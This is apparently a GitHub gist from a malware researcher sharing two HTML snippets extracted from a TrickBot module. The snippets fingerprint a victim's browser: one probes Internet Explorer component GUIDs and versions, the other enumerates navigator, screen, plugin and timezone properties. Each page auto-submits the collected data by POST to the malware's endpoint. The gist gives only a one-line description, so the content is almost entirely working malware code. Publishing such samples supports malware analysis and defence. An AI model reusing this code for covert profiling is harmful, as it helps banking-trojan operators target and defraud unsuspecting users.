Skip to content

Instantly share code, notes, and snippets.

@hasherezade hasherezade/fingerprint1.html Secret
Created Aug 1, 2017

Embed
What would you like to do?
Snippets found in TrickBot module - used for browser fingerprinting
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=10">
<script type="text/javascript">
function ahead()
{
var str = new String('');
try{
var components = new Array(
'7790769C-0471-11D2-AF11-00C04FA35D02',
'89820200-ECBD-11CF-8B85-00AA005B4340',
'47F67D00-9E55-11D1-BAEF-00C04FC2D130',
'76C19B38-F0C8-11CF-87CC-0020AFEECF20',
'76C19B34-F0C8-11CF-87CC-0020AFEECF20',
'76C19B33-F0C8-11CF-87CC-0020AFEECF20',
'9381D8F2-0288-11D0-9501-00AA00B911A5',
'4F216970-C90C-11D1-B5C7-0000F8051515',
'283807B5-2C60-11D0-A31D-00AA00B92C03',
'44BBA848-CC51-11CF-AAFA-00AA00B6015C',
'76C19B36-F0C8-11CF-87CC-0020AFEECF20',
'89820200-ECBD-11CF-8B85-00AA005B4383',
'5A8D6EE0-3E18-11D0-821E-444553540000',
'630B1DA0-B465-11D1-9948-00C04F98BBC9',
'08B0E5C0-4FCB-11CF-AAA5-00401C608555',
'45EA75A0-A269-11D1-B5BF-0000F8051515',
'DE5AED00-A4BF-11D1-9948-00C04F98BBC9',
'76C19B30-F0C8-11CF-87CC-0020AFEECF20',
'76C19B31-F0C8-11CF-87CC-0020AFEECF20',
'76C19B50-F0C8-11CF-87CC-0020AFEECF20',
'D27CDB6E-AE6D-11CF-96B8-444553540000',
'2A202491-F00D-11CF-87CC-0020AFEECF20',
'5945C046-LE7D-LLDL-BC44-00C04FD912BE',
'22D6F312-B0F6-11D0-94AB-0080C74C7E95', // 'WinMediaPlayerTrad'
'3AF36230-A269-11D1-B5BF-0000F8051515', // 'OfflineBrwPack'
'44BBA840-CC51-11CF-AAFA-00AA00B6015C', // 'OutlookExpress'
'44BBA842-CC51-11CF-AAFA-00AA00B6015B', // 'NetMeetingNT'
'76C19B32-F0C8-11CF-87CC-0020AFEECF20', // 'PanEuropeanDS'
'76C19B35-F0C8-11CF-87CC-0020AFEECF20', // 'ThaiDS'
'CC2A9BA0-3BDD-11D0-821E-444553540000', // 'TaskScheduler'
'3BF42070-B3B1-11D1-B5C5-0000F8051515', // 'Uniscribe'
'10072CEC-8CC1-11D1-986E-00A0C955B42F', // 'VML'
'76C19B37-F0C8-11CF-87CC-0020AFEECF20', // 'VietnameseDS'
'08B0E5C0-4FCB-11CF-AAA5-00401C608500', // 'MsftVM'
'4F645220-306D-11D2-995D-00C04F98BBC9', // 'VBScripting'
'73FA19D0-2D75-11D2-995D-00C04F98BBC9' // 'WebFolders'
);
document.body.addBehavior('#default#clientCaps');
for (i = 0; i < components.length; i++)
{
var ver = document.body.getComponentVersion('{'+components[i]+'}','ComponentID');
if (ver)
{
p=String(i+1);
str+='xie.com.'+p+'.guid='+'{'+components[i]+'}\n';
str+='xie.com.'+p+'.version='+ver+'\n';
}
}
} catch(e){
str='exept=true';
}
textedit = document.getElementById('data');
textedit.value = str;
}
</script>
</head>
<body>
<form name="frm" action="marker_" method="post">
<textarea id="data" name="values" cols="100" rows="20">
</textarea><br>
<input type="submit" value="send" >
</form>
<script>ahead();frm.submit()</script>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
function ahead()
{
objs = new Array([navigator, "navigator"], [screen, "screen"]);
str = new String("");
for(i = 0; i<objs.length; i++) {
for(var prop in objs[i][0]) {
val = objs[i][0][prop];
if(val === "")
if(objs[i][1] == "screen") val = 0;
else val = '""';
if(typeof(val) == 'object' && val != null)
st = "[object]";
else
st = String(val);
//if(st[0] == 'f') break;
st = st.replace(/\n|\r/g, "");
str += objs[i][1] + "." + prop + " = " + st + "\n";
}
}
//plugins
str += "plugins.hide = true\n";
var plugN = navigator.plugins.length;
for(i = 0; i < plugN; i++) {
for(var atr in navigator.plugins[i]) {
str += "plugins." + (i + 1) + "." + atr + " = " +
String(navigator.plugins[i][atr]).replace(/\n|\r/g,"") + "\n";
}
}
var d = new Date();
str += "timezone = " + d.getTimezoneOffset() + "\n";
str+='navigator.javaEnabled()='+navigator.javaEnabled().toString()+'\n';
var ua = navigator.userAgent;
var ie = ua.indexOf('msie')>=0 || ua.indexOf('Trident')>=0;
if(ie) {
document.getElementById('ie').value = 'sux';
str+='xie.ScriptEngineBuildVersion()='+String(ScriptEngineBuildVersion())+'\n';
} else {
str+='xie.ScriptEngineBuildVersion()=\n';
}
textedit = document.getElementById("data");
textedit.value = str;
}
</script>
</head>
<body>
<form name="frm" action="marker_" method="post">
<textarea id="data" name="values" cols="100" rows="20">
</textarea><br>
<input id="ie" name="ie" type="hidden">
<input type="submit" value="send" >
</form>
<script>ahead();frm.submit()</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.